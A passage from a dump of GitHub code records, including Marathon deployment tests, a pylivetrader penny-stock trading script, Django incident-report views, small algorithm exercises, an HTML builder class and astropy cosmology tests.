destroy(id=a['id'], host=host)\n\n with timeout(15):\n while len(deployments(host=host)):\n time.sleep(.1)\n\n assert len(apps(host=host)) == 0\n\n\ndef test_marathon():\n uris = ['https://github.com/cloudpipe/cloudpickle/archive/v0.2.1.tar.gz']\n pythonpath = '$MESOS_SANDBOX/cloudpickle-0.2.1'\n\n @marathon(docker=None, cpus=0.1, mem=64, path=pythonpath, uris=uris,\n host=host)\n def test(a, b):\n while True:\n time.sleep(0.1)\n print('Slept 0.1s')\n\n mid = test(1, 2)\n with timeout(20):\n while len(deployments(host=host)):\n time.sleep(.1)\n\n result = app(id=mid, host=host)\n assert result['tasksRunning'] == 1\n\n\ndef test_marathon_docker():\n @marathon(cpus=0.1, mem=64, host=host)\n def docker(a, b):\n while True:\n time.sleep(0.1)\n print('Slept 0.1s')\n\n mid = docker(1, 2)\n 
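# give Marathon up to 20 seconds to finish the deployment before asserting\n 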
with timeout(20):\n while len(deployments(host=host)):\n time.sleep(.1)\n\n result = app(id=mid, host=host)\n assert result['tasksRunning'] == 1\n","repo_name":"daskos/epos","sub_path":"epos/tests/test_marathon.py","file_name":"test_marathon.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"3909191703","text":"from pylivetrader.api import (\r\n attach_pipeline,\r\n date_rules,\r\n time_rules,\r\n order,\r\n order_target,\r\n order_target_percent,\r\n get_open_orders,\r\n cancel_order,\r\n pipeline_output,\r\n schedule_function,\r\n symbols,\r\n)\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\n#API imports for pipeline\r\nfrom pylivetrader.finance.execution import LimitOrder\r\nfrom zipline.pipeline import Pipeline\r\n#from quantopian.pipeline import Pipeline\r\n#from quantopian.algorithm import attach_pipeline, pipeline_output\r\nfrom pipeline_live.data.iex.pricing import USEquityPricing\r\n#from quantopian.pipeline.data.builtin import USEquityPricing\r\nfrom pipeline_live.data.polygon.filters import (\r\n IsPrimaryShareEmulation as IsPrimaryShare)\r\n#from quantopian.pipeline.filters.morningstar import IsPrimaryShare #,Q3000US, QTradableStocksUS\r\nfrom pipeline_live.data.iex.factors import (\r\n AnnualizedVolatility\r\n)\r\n#from quantopian.pipeline.factors import AnnualizedVolatility\r\nimport logbook\r\nlog = logbook.Logger('algo')\r\n\r\ndef record(*args, **kwargs):\r\n print('args={}, kwargs={}'.format(args, kwargs))\r\n log.info(\"START TEST\")\r\n\r\ndef initialize(context): # runs once when script starts\r\n #context is a python dictionary that contains information on portfolio/performance.\r\n context.idr_losers = pd.Series(([]))\r\n context.day_count = 0\r\n context.daily_message = \"Day {}.\"\r\n context.open_orders = get_open_orders()\r\n context.backup_stocks = symbols('VTI')\r\n\r\n #Factor criteria\r\n #dolvol = AverageDollarVolume(window_length = 1)\r\n close_price = USEquityPricing.close.latest\r\n vol = USEquityPricing.volume.latest\r\n ann_var = AnnualizedVolatility()\r\n #daily_return = DailyReturns([USEquityPricing.close], window_length = 2) #-- going to use history instead of pipeline\r\n \r\n #screening\r\n mask_custom = (IsPrimaryShare() & (vol < 200000) & (close_price > 1) & (close_price < 3) & (ann_var > 0.815)) # Q3000US(8000000) &\r\n stockBasket = USEquityPricing.close.latest.top(3000, mask = mask_custom)\r\n \r\n #Column construction\r\n pipe_columns = {'close_price': close_price, \"volume\": vol, 'ann_var': ann_var}\r\n \r\n #Creation of actual pipeline\r\n pipe = Pipeline(columns = pipe_columns, screen = stockBasket)\r\n attach_pipeline(pipe, \"Stocks\")\r\n\r\n #Schedule functions\r\n schedule_function(late_day_trade, date_rules.every_day(), time_rules.market_open(hours = 5, minutes = 56)) #offset open tells when to run a user defined function\r\n schedule_function(check_portfolio, date_rules.every_day(), time_rules.market_open(hours = 0, minutes = 1))\r\n schedule_function(morning_day_trade1, date_rules.every_day(), time_rules.market_open(hours = 0, minutes = 15))\r\n #schedule_function(check_portfolio, date_rules.every_day(), time_rules.market_open(hours = 0, minutes = 16))\r\n schedule_function(morning_day_trade2, date_rules.every_day(), time_rules.market_open(hours = 0, minutes = 45))\r\n \r\n #schedule_function(morning_day_trade3, date_rules.every_day(), time_rules.market_open(hours = 2, minutes = 0))\r\n #schedule_function(check_portfolio, date_rules.every_day(), 
time_rules.market_open(hours = 0, minutes = 48))\r\n \r\ndef late_day_trade(context, data):\r\n #Get the pipeline output\r\n pipe_output = pipeline_output('Stocks')\r\n context.days_stocks = pipe_output.sort_values(by =['ann_var'], ascending = False)\r\n #log.info(context.days_stocks)\r\n log.info(context.daily_message, context.day_count)\r\n log.info(context.days_stocks)\r\n log.info(type(context.days_stocks))\r\n \r\n #Calculate Daily Return Top Losers\r\n if (context.days_stocks.size > 0):\r\n price_history = data.history(context.days_stocks.index, \"price\", 745, \"1m\") #356 +390\r\n open_prices = price_history.iloc[0]\r\n current_prices = price_history.iloc[-1]\r\n context.idr_losers = ((current_prices - open_prices) / open_prices).sort_values()\r\n context.idr_losers = context.idr_losers[0:5]#5 \r\n log.info(context.idr_losers)\r\n else:\r\n price_history = data.history(context.backup_stocks, \"price\", 1 , \"1m\") #356\r\n current_prices = price_history.iloc[-1]\r\n context.idr_losers = current_prices #Stock info is irrelevant here \r\n \r\n pct_cash = context.portfolio.cash/context.portfolio.portfolio_value\r\n \r\n #Get Open Orders and Buy\r\n for stock in context.idr_losers.index:\r\n if(data.can_trade(stock)):\r\n if(stock not in context.open_orders):\r\n order_target_percent(stock, pct_cash/(context.idr_losers.size + 1))\r\n \r\n #Check Portfolio\r\n #log.info(type(context.portfolio.positions))\r\n record(leverage = context.account.leverage) #be sure to always track leverage\r\n record(cash = context.portfolio.cash)\r\n record(port_value = context.portfolio.portfolio_value)\r\n \r\ndef morning_day_trade1(context, data):\r\n context.day_count += 1\r\n log.info(context.daily_message, context.day_count)\r\n for stock in context.portfolio.positions:\r\n if((data.current(stock, 'price')) - context.portfolio.positions[stock].cost_basis)/context.portfolio.positions[stock].cost_basis > 0.001:\r\n if (context.portfolio.positions[stock].cost_basis > 0):\r\n num_shares = context.portfolio.positions[stock].amount\r\n order_target(stock, num_shares/2)\r\n log.info(\"{} Current Price = {} :: Cost Basis = {}\",stock.symbol, data.current(stock, 'price'), context.portfolio.positions[stock].cost_basis)\r\n \r\ndef morning_day_trade2(context, data):\r\n for stock in context.portfolio.positions:\r\n if((data.current(stock, 'price')) - context.portfolio.positions[stock].cost_basis)/context.portfolio.positions[stock].cost_basis > 0.001:\r\n if (context.portfolio.positions[stock].amount > 0): #or context.portfolio.positions[stock].amount < 0):\r\n order_target_percent(stock, 0)\r\n log.info(\"{} Current Price = {} :: Cost Basis = {}\",stock.symbol, data.current(stock, 'price'), context.portfolio.positions[stock].cost_basis)\r\n \r\ndef morning_day_trade3(context, data):\r\n for stock in context.portfolio.positions:\r\n if((data.current(stock, 'price')) - context.portfolio.positions[stock].cost_basis)/context.portfolio.positions[stock].cost_basis > 0.2:\r\n if (context.portfolio.positions[stock].amount > 0): #or context.portfolio.positions[stock].amount < 0):\r\n order_target_percent(stock, 0)\r\n log.info(\"{} Current Price = {} :: Cost Basis = {}\",stock.symbol, data.current(stock, 'price'), context.portfolio.positions[stock].cost_basis)\r\n \r\ndef check_portfolio(context, data): #Check for possible splits\r\n i = 0\r\n for stock in context.portfolio.positions:\r\n i = i + 1\r\n if ((data.current(stock, 'price') - 
+{"seq_id":"2797081310","text":"# Dictionary Exercise 4 (Value Containing Key)\n# 0 possible points (ungraded)\n# Write a function named return_keys which accepts a dictionary and an integer as input and returns an ascending sorted list of all the keys whose values contain the input integer. Note that the keys of this dictionary are strings while the values of this dictionary are 1 Dimensional lists of integers. For example if the input dictionary is:\n#\n# sample_dictionary = {\"rabbit\" : [1, 2, 3], \"kitten\" : [2, 2, 6], \"lioness\": [6, 8, 9]}\n# if your function is called as return_keys(sample_dictionary,2) , then your function should return:\n# [ \"kitten\", \"rabbit\",]\n# If the input integer is not found then your function should return an empty list.\n#\ndef return_keys(sample_dictionary, sample_value):\n    output_list = []\n    for nombre in sample_dictionary.keys():\n        # a membership test works for value lists of any length\n        if sample_value in sample_dictionary[nombre]:\n            output_list.append(nombre)\n    output_list.sort()\n    return output_list\n\n# NOTE: SUBMIT ONLY THE FUNCTION!!! \n# Main Program #\nsample_value=2\nsample_dictionary = {'Crow': [11, 12, 3], 'Chicken': [12, 2, 16], 'Bat': [12, 3, 0], 'Sparrow': [6, 8, 9]}\nevalua_return_keys = return_keys(sample_dictionary, sample_value)\nprint(evalua_return_keys)\n","repo_name":"ivanromanv/manuales","sub_path":"Python/Edx_Course/Introduction to Programming Using Python/Excercises/W7_Dictionary_E4_Function_valor_contiene_clave.py","file_name":"W7_Dictionary_E4_Function_valor_contiene_clave.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
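For reference, the exercise above can also be solved with a single comprehension; a minimal equivalent sketch (the name return_keys_short is made up for illustration):

def return_keys_short(sample_dictionary, sample_value):
    # sorted() already returns the ascending list the exercise asks for
    return sorted(key for key, values in sample_dictionary.items()
                  if sample_value in values)

assert return_keys_short({'rabbit': [1, 2, 3], 'kitten': [2, 2, 6]}, 2) == ['kitten', 'rabbit']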
+{"seq_id":"15554831163","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom .models import KPIIncidentReport, KPILead, KPITeam, KPICompany\nfrom .forms import IReportForm\nfrom django.contrib.auth.decorators import login_required\n\nimport openpyxl\nimport datetime\n\n\n@login_required(login_url='/')\ndef kpi_home_page(request):\n    context = dict()\n    context['incidents'] = KPIIncidentReport.objects.all()\n    return render(request, 'templates/index.html', context)\n\n\n@login_required(login_url='/')\ndef incident_detail(request, incident_id):\n    context = dict()\n    context['incident'] = KPIIncidentReport.objects.get(pk=incident_id)\n    return render(request, 'templates/incident_detail.html', context)\n\n\n@login_required(login_url='/')\ndef kpi_leads(request):\n    context = dict()\n    context['companies'] = KPICompany.objects.all()\n    context['leads'] = KPILead.objects.all()\n    return render(request, 'templates/eftleads.html', context)\n\n\n@login_required(login_url='/')\ndef kpi_teams(request):\n    context = dict()\n    context['companies'] = KPICompany.objects.all()\n    context['teams'] = KPITeam.objects.all()\n    return render(request, 'templates/eftteams.html', context)\n\n\n@login_required(login_url='/')\ndef eftlead_detail(request, eftlead_id):\n    context = dict()\n    context['eftlead'] = KPILead.objects.get(pk=eftlead_id)\n    context['team_names'] = KPITeam.objects.filter(eft_lead__id=eftlead_id)\n    context['incidents'] = KPIIncidentReport.objects.filter(eft_lead__id=eftlead_id)\n    context['image_url'] = context['eftlead'].profile_pic.url\n    return render(request, 'templates/eftlead.html', context)\n\n\n@login_required(login_url='/')\ndef eftteam_detail(request, eftteam_id):\n    context = dict()\n    context['eftteam'] = KPITeam.objects.get(pk=eftteam_id)\n    context['eftleads'] = KPILead.objects.filter(kpiteam__id=eftteam_id)\n    context['incidents'] = KPIIncidentReport.objects.filter(team_name__id=eftteam_id)\n    context['team_picture'] = context['eftteam'].team_pic.url\n    return render(request, 'templates/eftteam.html', context)\n\n\n@login_required(login_url='/')\ndef kpi_company(request, company_id):\n    context = dict()\n    context['company'] = KPICompany.objects.get(pk=company_id)\n\n    context['eftleads'] = KPILead.objects.filter(company__id=company_id)\n    context['lead_count'] = len(KPILead.objects.filter(company__id=company_id))\n\n    context['teams'] = KPITeam.objects.filter(company__id=company_id)\n    context['team_count'] = len(KPITeam.objects.filter(company__id=company_id))\n\n    context['incidents'] = KPIIncidentReport.objects.filter(company__id=company_id)\n    context['inc_count'] = len(KPIIncidentReport.objects.filter(company__id=company_id))\n\n    context['company_picture'] = context['company'].company_pic.url\n    return render(request, 'templates/eft_company.html', context)\n\n\n@login_required(login_url='/')\ndef kpi_create(request):\n    if request.method == \"POST\":\n        form = IReportForm(request.POST)\n        if form.is_valid():\n            incident = KPIIncidentReport()\n            incident.date = form.cleaned_data['date']\n            incident.ir_num = form.cleaned_data['ir_num']\n\n            incident.company = form.cleaned_data['company']\n            incident.eft_lead = form.cleaned_data['eft_lead']\n            incident.team_name = form.cleaned_data['team_name']\n            incident.incident = form.cleaned_data['incident']\n            incident.description = form.cleaned_data['description']\n            incident.hours_deducted = form.cleaned_data['hours_deducted']\n            incident.reportable = form.cleaned_data['reportable']\n            incident.reason = form.cleaned_data['reason']\n\n            incident.save()\n            return redirect('kpi_home_page')\n        else:\n            print(\"Form is not valid.\")\n    else:\n        form = IReportForm()\n    return render(request, 'templates/eftcreate.html', {'form': form})\n\n\n@login_required(login_url='/')\ndef kpi_update(request, incident_id):\n    incident = get_object_or_404(KPIIncidentReport, pk=incident_id)\n    form = IReportForm(request.POST or None, instance=incident)\n    if form.is_valid():\n        instance = form.save(commit=False)\n        instance.save()\n        return redirect('kpi_home_page')\n    return render(request, 'templates/eftcreate.html', {'form': form})\n\n\n@login_required(login_url='/')\ndef kpi_export(request, incident_id):\n    incident = get_object_or_404(KPIIncidentReport, pk=incident_id)\n    wb = openpyxl.load_workbook(\"Incident Report.xlsx\")\n    ws = wb[\"Sheet1\"]  # get_sheet_by_name() was deprecated and removed in openpyxl 3.x\n    ws.cell(row=1, column=1).value = \"Incident Report \" + incident.ir_num\n    ws.cell(row=3, column=5).value = incident.date\n    ws.cell(row=4, column=5).value = incident.ir_num\n    ws.cell(row=5, column=5).value = incident.company.name\n    ws.cell(row=6, column=5).value = incident.eft_lead.name\n    ws.cell(row=7, column=5).value = incident.team_name.name\n    ws.cell(row=8, column=5).value = incident.hours_deducted\n    ws.cell(row=9, column=5).value = incident.reportable\n    ws.cell(row=10, column=5).value = incident.reason\n    ws.cell(row=12, column=5).value = datetime.datetime.now()\n    ws.cell(row=13, column=5).value = ''\n\n    file_name = \"Incident Report \" + incident.ir_num + \".xlsx\"\n\n    wb.save(file_name)\n    return redirect('kpi_home_page')\n\n\n@login_required(login_url='/')\ndef kpi_delete(request, incident_id):\n    incident = get_object_or_404(KPIIncidentReport, pk=incident_id)\n    incident.delete()\n    return redirect('kpi_home_page')\n\n\n@login_required(login_url='/')\ndef kpi_duplicate(request):\n    return render(request, 'templates/kpi_duplicate.html')\n\n\n@login_required(login_url='/')\ndef kpi_help(request):\n    context = dict()\n    return render(request, 'templates/help.html', context)","repo_name":"GStrydom/incidentreport","sub_path":"kpi/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
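The kpi_export view above fills a template workbook cell by cell; a self-contained sketch of the same openpyxl pattern (the file name and cell layout here are illustrative):

import openpyxl

wb = openpyxl.Workbook()                  # fresh workbook instead of a template
ws = wb['Sheet']                          # the default sheet; a template would use load_workbook()
ws.cell(row=1, column=1).value = 'Incident Report IR-001'
ws.cell(row=3, column=5).value = '2023-01-31'
wb.save('Incident Report IR-001.xlsx')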
+{"seq_id":"16027343284","text":"# number of visible points, S2, prefix sums, math\n# a point (x, y) is visible only if x and y do not divide each other evenly\n# y % x != 0\n# x % y != 0 -> gcd(x, y) == 1\n\nfrom math import gcd\nfrom sys import stdin\n\npsum = [0 for _ in range(1001)]\npsum[1] = 3\nfor x in range(2, 1001):\n    cnt = 0\n    for y in range(1, x + 1):\n        if x == y: # only count half (skip the diagonal)\n            continue\n        if gcd(x, y) == 1:\n            cnt += 2 # +2 each, since points are symmetric about y=x\n    psum[x] = psum[x-1] + cnt\n\n\nC = int(stdin.readline())\nfor _ in range(C):\n    n = int(stdin.readline())\n    print(psum[n])","repo_name":"lookinmin/CodingTest","sub_path":"누적합/BOJ_2725.py","file_name":"BOJ_2725.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16092441287","text":"import math\nclass Node:\n    def __init__(self, value):\n        self.right = None\n        self.left = None\n        self.value = value\n\na = Node(5)\nb = Node(11)\nc = Node(3)\nd = Node(4)\ne = Node(2)\nf = Node(1)\n\n#a = Node('a')\n#b = Node('b')\n#c = Node('c')\n#d = Node('d')\n#e = Node('e')\n#f = Node('f')\n\na.left = b\na.right = c\nb.left = d\nb.right = e\nc.right = f\n\ndef maxPathSum(root : Node):\n    if root == None: return -math.inf\n    if root.left == None and root.right == None: return root.value\n    return root.value + max(maxPathSum(root.left), maxPathSum(root.right))\n\nprint(maxPathSum(a))\n","repo_name":"tyren234/codes","sub_path":"python/random/btree_max_path_sum.py","file_name":"btree_max_path_sum.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
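A quick hand check of the prefix-sum table built in BOJ_2725 above (illustrative, not part of the submission): for n=2 the visible points are (1,0), (0,1), (1,1), (1,2) and (2,1), so psum[2] must be 5.

from math import gcd

visible = {(1, 0), (0, 1)} | {(x, y) for x in range(1, 3) for y in range(1, 3) if gcd(x, y) == 1}
assert len(visible) == 5  # matches psum[2] = psum[1] + 2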
+{"seq_id":"9501502723","text":"def jitter(wild):\n    \"\"\"\n'jitter' is a recursive iterator function which effectively jumps in and out of\nelement context as necessary to unravel a 'tree' of html elements, and strings in\nlists and tuples.\n    \"\"\"\n    if not wild:\n        return\n    elif isinstance(wild, str):\n        yield wild\n    elif isinstance(wild, (list, tuple)):\n        for el in wild:\n            yield from jitter(el)\n    else:\n        yield from wild\n\n\nclass Element:\n\n    \"\"\"\nEach possible HTML tag is defined as a class inheriting this class.\nThe name of the class is the lower case tag string with a leading underscore added,\ne.g. '_h3' or '_br'. When no attributes are associated with a tag, it can be expressed\nsimply by e.g. 'h.br' or 'h.h4' (without the quotes). Such references are 'corrected'\n(by __getattr__ - see above) to return an instance of the corresponding class.\nWhen, however, attributes are required, it must be expressed as e.g.\n'h.a(href='somewhere')'. Note that this calls - not creates - an instance (see\nmember function '__call__' below). Differences of the 'rules of use' of various html tags\nare handled by the attribute 'attr_dict' which can be an (often empty) tuple of\ndictionaries. Keys of each dictionary represent valid attributes for this _Element.\nThe corresponding values are (in the current implementation) booleans indicating\nwhether a value is associated with this attribute. False means that the value must not be\nsupplied and will automatically be derived from the attribute name. This will probably be\nchanged in a later release, e.g. to use a function or class as a value; this will make\nvalidation and manipulation of numeric values easier. N.B. class Element must be declared\nwithin class _HTML40. This ensures that e.g. h._h4 where h is obtained by e.g.\n'h = _HTML40()' is a valid attribute reference (see __getattr__ above).\n    \"\"\"\n    attr_dict = {}\n    ok_attrs = None\n    # 'separate_close' is True for most Elements but False for tags like 'br' which are\n    # self-contained and so don't require a separate closing tag.\n    #\n    separate_close = True\n    dented = True\n\n    def __init__(self, tag=None, separate_close=None, children=[], **sArgs):\n        self.tag = tag\n        self.sArgs = sArgs\n        self.children = children[:]\n        if separate_close is not None: # use None for 'no overrule'\n            self.separate_close = separate_close\n\n    def __call__(self, **args):\n        \"\"\"\nThis function makes it possible to derive tags with attributes by calling the tag with\narguments, e.g. 'h.img(src='picture.jpg')'.\nBeware: this looks like a simple instance creation but isn't; h.img already returns an\ninstance so the bracketed construction gets routed to this function.\nThis construction can be used with empty brackets to force a copy operation as opposed\nto just a name alias; i.e. 'my_table = h.table()' is kind of analogous to the following\n'trick' for lists: 'my_list = precious_list[:]'.\n        \"\"\"\n        if self.ok_attrs is None:\n            if isinstance(self.attr_dict, dict):\n# Changed while extending phileas for HTML5: support single dictionary or list of dictionaries.\n                self.ok_attrs = self.attr_dict\n            else:\n                self.ok_attrs = {}\n                for d in self.attr_dict:\n                    self.ok_attrs.update(d)\n        s_args = {}\n        for key, val in args.items():\n            key = key.lower().replace('_', '-')\n            # print (self.ok_attrs.keys())\n            if not key in self.ok_attrs.keys():\n                raise KeyError(key)\n            if not self.ok_attrs[key]:\n                s_args[key] = key\n            else:\n                # the following statement is currently essentially\n                # just a cheap and cheerful way to allow numeric\n                # values to be specified without quotes; room for improvement here!\n                s_args[key] = str(val)\n        return self.__class__(tag=self.tag, separate_close=self.separate_close,\n                              **s_args)\n\n    def _as_children(self, other):\n        \"\"\"\nFunction '_as_children' is used internally by several public customization member functions.\nIts purpose is to avoid unnecessary nesting of Elements when the child\nElement has no tag; in this case, its children can be taken on board by its new parent.\n        \"\"\"\n        return ((other is self or isinstance(other, self.__class__)) and other.tag is None\n                and other.children or [other, ])\n\n    def __or__(self, other):\n        \"\"\"\nmember function '__or__' ensures that code like e.g. 'h.h4 | \"expression\"',\nwhen converted to a string, results in '<h4>expression</h4>'.\nSimilarly 'h.a(href=\"myLink\") | \"text\"' becomes '<a href=\"myLink\">text</a>'.\n        \"\"\"\n        return self.__class__(tag=self.tag, separate_close=self.separate_close,\n                              children=self._as_children(other), **self.sArgs)\n\n    __ror__ = __or__\n    \"\"\" \nThe above definition ensures that the '|' operator (see above) is symmetrical.\n    \"\"\"\n\n    def __ior__(self, other):\n        \"\"\"\nMember function '__ior__' facilitates adding more child Elements to an\nalready defined html Element, using the '|=' in-place operator\n        \"\"\"\n        self.children.extend(self._as_children(other))\n        return self\n\n    def __and__(self, other):\n        \"\"\"\nThis member function facilitates the use of & (usually a bit-wise 'and') to conditionally\napply HTML operators, e.g.:\n'(this_user==selected_user)&h.em | \"this is highlighted when it relates to selected user\"'.\n        \"\"\"\n        return self if other else self.__class__(tag=None, separate_close=False) # if false, return 'lame' html tag.\n\n    __rand__ = __and__ # '&' operator is symmetrical\n\n    def __add__(self, other):\n        \"\"\"\nThis custom function was introduced very late in the development in order to\nfacilitate the use of '+' instead of ',' for concatenating Elements. This will\ndrastically reduce the amount of 'unravelling' when resolving complex nested\nHTML objects into strings.\n        \"\"\"\n        if not other:\n            return self() # just return clone of self!\n\n        return self.__class__(tag=None, separate_close=False,\n                              children=self._as_children(self)+self._as_children(other))\n\n    def __radd__(self, other):\n        \"\"\" note that our addition is not commutative!\n        \"\"\"\n        return self.__class__(tag=None, separate_close=False,\n                              children=self._as_children(other)+self._as_children(self))\n\n    def __mul__(self, other):\n        return sum([self for _ in range(other)], None)\n\n    __rmul__ = __mul__ # multiplication is commutative; e.g. h.br*5 and 5*h.br are equivalent\n\n    def __iter__(self):\n        if self.tag is not None: # special case for 'orphan' Elements\n            yield \"<%s\" % self.tag\n            for key, val in self.sArgs.items():\n                if val is not None:\n                    yield ' %s=\"%s\"' % (key.lower(), val)\n            if not self.separate_close:\n                yield '/'\n            yield '>'\n        yield from jitter(self.children)\n        if self.separate_close:\n            yield '</%s>' % self.tag\n            if self.tag not in ('span', 'a'):\n                yield '\\n'\n\n    def join(self, seq):\n        \"\"\"\nMember function 'join' ensures that the construction\n(e.g.) 'h.br.join(seq)' causes items of the sequence to\nbe interspersed with blank lines when output. 
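For instance, assuming an element factory 'h' as in the examples above,
str(h.br.join(['one', 'two'])) gives 'one<br/>two'.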
Items of the\nsequence with the value 'None' are ignored completely\n(but zero length strings are treated normally!)\n \"\"\"\n return self.__class__( tag=None, separate_close=False,\n children=(seq[:1] + [(self+term) for term in seq[1:]]))\n\n def __str__(self, glue=''):\n return glue.join(str(el) for el in self)","repo_name":"papahippo/phileas","sub_path":"phileas/element.py","file_name":"element.py","file_ext":"py","file_size_in_byte":7790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18587822301","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\n\"\"\"Testing :mod:`astropy.cosmology.core`.\"\"\"\n\nimport abc\nimport inspect\nimport pickle\n\nimport numpy as np\nimport pytest\n\nimport astropy.cosmology.units as cu\nimport astropy.units as u\nfrom astropy.cosmology import Cosmology, FlatCosmologyMixin\nfrom astropy.cosmology.core import _COSMOLOGY_CLASSES\nfrom astropy.cosmology.parameter import Parameter\nfrom astropy.cosmology.parameter.tests.test_descriptors import (\n ParametersAttributeTestMixin,\n)\nfrom astropy.cosmology.parameter.tests.test_parameter import ParameterTestMixin\nfrom astropy.cosmology.tests.test_connect import (\n ReadWriteTestMixin,\n ToFromFormatTestMixin,\n)\nfrom astropy.table import Column, QTable, Table\nfrom astropy.utils.compat import PYTHON_LT_3_11\n\n##############################################################################\n# SETUP / TEARDOWN\n\n\ndef make_valid_zs(max_z: float = 1e5):\n \"\"\"Make a list of valid redshifts for testing.\"\"\"\n # scalar\n scalar_zs = [\n 0,\n 1,\n min(1100, max_z), # interesting times\n # FIXME! np.inf breaks some funcs. 0 * inf is an error\n np.float64(min(3300, max_z)), # different type\n 2 * cu.redshift,\n 3 * u.one, # compatible units\n ]\n # array\n _zarr = np.linspace(0, min(1e5, max_z), num=20)\n array_zs = [\n _zarr, # numpy\n _zarr.tolist(), # pure python\n Column(_zarr), # table-like\n _zarr * cu.redshift, # Quantity\n ]\n return scalar_zs, _zarr, array_zs, scalar_zs + array_zs\n\n\nscalar_zs, z_arr, array_zs, valid_zs = make_valid_zs()\n\ninvalid_zs = [\n (None, TypeError), # wrong type\n # Wrong units (the TypeError is for the cython, which can differ)\n (4 * u.MeV, (u.UnitConversionError, TypeError)), # scalar\n ([0, 1] * u.m, (u.UnitConversionError, TypeError)), # array\n]\n\n\nclass SubCosmology(Cosmology):\n \"\"\"Defined here to be serializable.\"\"\"\n\n H0 = Parameter(unit=\"km/(s Mpc)\")\n Tcmb0 = Parameter(default=0 * u.K, unit=u.K)\n m_nu = Parameter(default=0 * u.eV, unit=u.eV)\n\n def __init__(self, H0, Tcmb0=0 * u.K, m_nu=0 * u.eV, name=None, meta=None):\n super().__init__(name=name, meta=meta)\n self.H0 = H0\n self.Tcmb0 = Tcmb0\n self.m_nu = m_nu\n\n @property\n def is_flat(self):\n return super().is_flat()\n\n\n##############################################################################\n# TESTS\n##############################################################################\n\n\nclass MetaTestMixin:\n \"\"\"Tests for a :class:`astropy.utils.metadata.MetaData` on a Cosmology.\"\"\"\n\n def test_meta_on_class(self, cosmo_cls):\n assert cosmo_cls.meta is None\n\n def test_meta_on_instance(self, cosmo):\n assert isinstance(cosmo.meta, dict) # test type\n # value set at initialization\n assert cosmo.meta == self.cls_kwargs.get(\"meta\", {})\n\n def test_meta_mutable(self, cosmo):\n \"\"\"The metadata is NOT immutable on a cosmology\"\"\"\n key = next(iter(cosmo.meta.keys())) # select some key\n 
cosmo.meta[key] = cosmo.meta.pop(key) # will error if immutable\n\n\nclass CosmologyTest(\n ParameterTestMixin,\n ParametersAttributeTestMixin,\n MetaTestMixin,\n ReadWriteTestMixin,\n ToFromFormatTestMixin,\n metaclass=abc.ABCMeta,\n):\n \"\"\"Test subclasses of :class:`astropy.cosmology.Cosmology`.\"\"\"\n\n @abc.abstractmethod\n def setup_class(self):\n \"\"\"Setup for testing.\"\"\"\n\n def teardown_class(self):\n pass\n\n @property\n def cls_args(self):\n return tuple(self._cls_args.values())\n\n @pytest.fixture(scope=\"class\")\n def cosmo_cls(self):\n \"\"\"The Cosmology class as a :func:`pytest.fixture`.\"\"\"\n return self.cls\n\n @pytest.fixture(scope=\"function\") # ensure not cached.\n def ba(self):\n \"\"\"Return filled `inspect.BoundArguments` for cosmology.\"\"\"\n ba = self.cls._init_signature.bind(*self.cls_args, **self.cls_kwargs)\n ba.apply_defaults()\n return ba\n\n @pytest.fixture(scope=\"class\")\n def cosmo(self, cosmo_cls):\n \"\"\"The cosmology instance with which to test.\"\"\"\n ba = self.cls._init_signature.bind(*self.cls_args, **self.cls_kwargs)\n ba.apply_defaults()\n return cosmo_cls(*ba.args, **ba.kwargs)\n\n # ===============================================================\n # Method & Attribute Tests\n\n # ---------------------------------------------------------------\n # class-level\n\n def test_init_subclass(self, cosmo_cls):\n \"\"\"Test creating subclasses registers classes and manages Parameters.\"\"\"\n\n # -----------------------------------------------------------\n # Normal subclass creation\n\n class InitSubclassTest(cosmo_cls):\n pass\n\n # test parameters\n assert InitSubclassTest.parameters == cosmo_cls.parameters\n\n # test and cleanup registry\n registrant = _COSMOLOGY_CLASSES.pop(InitSubclassTest.__qualname__)\n assert registrant is InitSubclassTest\n\n # -----------------------------------------------------------\n # Skip\n\n class UnRegisteredSubclassTest(cosmo_cls):\n @classmethod\n def _register_cls(cls):\n \"\"\"Override to not register.\"\"\"\n\n assert UnRegisteredSubclassTest.parameters == cosmo_cls.parameters\n assert UnRegisteredSubclassTest.__qualname__ not in _COSMOLOGY_CLASSES\n\n def test_init_signature(self, cosmo_cls, cosmo):\n \"\"\"Test class-property ``_init_signature``.\"\"\"\n # test presence\n assert hasattr(cosmo_cls, \"_init_signature\")\n assert hasattr(cosmo, \"_init_signature\")\n\n # test internal consistency, so following tests can use either cls or instance.\n assert cosmo_cls._init_signature == cosmo._init_signature\n\n # test matches __init__, but without 'self'\n sig = inspect.signature(cosmo.__init__) # (instances don't have self)\n assert set(sig.parameters) == set(cosmo._init_signature.parameters)\n assert all(\n np.all(sig.parameters[k].default == p.default)\n for k, p in cosmo._init_signature.parameters.items()\n )\n\n # ---------------------------------------------------------------\n # instance-level\n\n def test_init(self, cosmo_cls):\n \"\"\"Test initialization.\"\"\"\n # Cosmology only does name and meta, but this subclass adds H0 & Tcmb0.\n cosmo = cosmo_cls(*self.cls_args, name=\"test_init\", meta={\"m\": 1})\n assert cosmo.name == \"test_init\"\n assert cosmo.meta[\"m\"] == 1\n\n # if meta is None, it is changed to a dict\n cosmo = cosmo_cls(*self.cls_args, name=\"test_init\", meta=None)\n assert cosmo.meta == {}\n\n def test_name(self, cosmo):\n \"\"\"Test property ``name``.\"\"\"\n assert cosmo.name is cosmo._name # accesses private attribute\n assert cosmo.name is None or 
